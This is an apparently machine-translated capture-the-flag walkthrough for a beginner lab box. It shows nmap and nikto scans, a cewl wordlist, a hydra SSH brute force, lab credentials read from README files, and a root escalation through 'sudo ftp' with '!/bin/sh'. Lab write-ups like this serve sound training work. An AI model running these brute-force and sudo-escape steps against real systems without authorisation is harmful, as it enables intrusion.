Description

A VERY beginner friendly box with a LOT of hand holding.

Once the system grabs an IP, head straight to the web port before scanning.

You will find your first set of instructions which starts the guided process.

Created in Virtualbox.

Goal: Get the root flag.

Your feedback is appreciated – Twitter: @iamv1nc3nt

This is a novice target , Teach you how to penetrate a machine , Each step has corresponding prompts .

Walkthrough

Get the target IP Address

sudo arp-scan -I eth0 -l 

Get IP10.0.2.20

Go directly to the web

View source code of webpage

Follow the prompts to visit rambo.html

Use nmap Port scan

nmap -p- 10.0.2.20 

Discover open 60022 port

scanning web Catalog

nikto -h http://10.0.2.20/ 

Found another website directory /johnnyrambo/, Browser access

Next is ssh Blast , use cewl Crawl the website to generate a wordlist

cewl -w words.txt -d 1 -m 5 http://10.0.2.20/johnnyrambo/ 

The statistical number of rows

wc -l words.txt                                                                     
137 words.txt

visit ssh.html

Crack johnny Password

hydra -l johnny -P words.txt -v 10.0.2.20 ssh -s 60022 -t 4 

Crack success , adopt ssh Landing system

ssh [email protected] -p 60022  

After logging into the system , Open... In the current directory README.txt

Prompted by , You can use the following command to view the local web Catalog

cat /etc/nginx/sites-enabled/default | grep -v "#"

Get into /var/www/html/ , Find another README.txt

lookup README.txt file

find / -type f -readable 2>/dev/null | grep README.txt

# 2>/dev/null  2 It's a standard error , Redirect standard error to /dev/null

see /opt/README.txt

Get an account password

username:  blood
password:  HackThePlanet2020!!

Switching users

su - blood

Landing successful , Find out blood User directory README.txt, Learn that in /home There may be some files in other user folders under the directory

Get into sly User folder found two files , But there is only one readable , Insufficient authority .

adopt sudo -l View current user permissions

sudo -l

blood Users can use sudo perform /bin/cat, see /home/sly/README.txt

sudo -u sly /bin/cat /home/sly/README.txt

obtain sly User's password ：SylvesterStalone

Switching users sly

View user permissions

[email protected]:~$ sudo -l
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties

utilize sudo, Sure root Permissions to perform ftp.

stay GTFOBins Website , Can be found and obtained root The method of authority

GTFOBins

[email protected]:~$ sudo ftp
[sudo] password for sly: 
ftp> !/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# 

ok. Successfully get root jurisdiction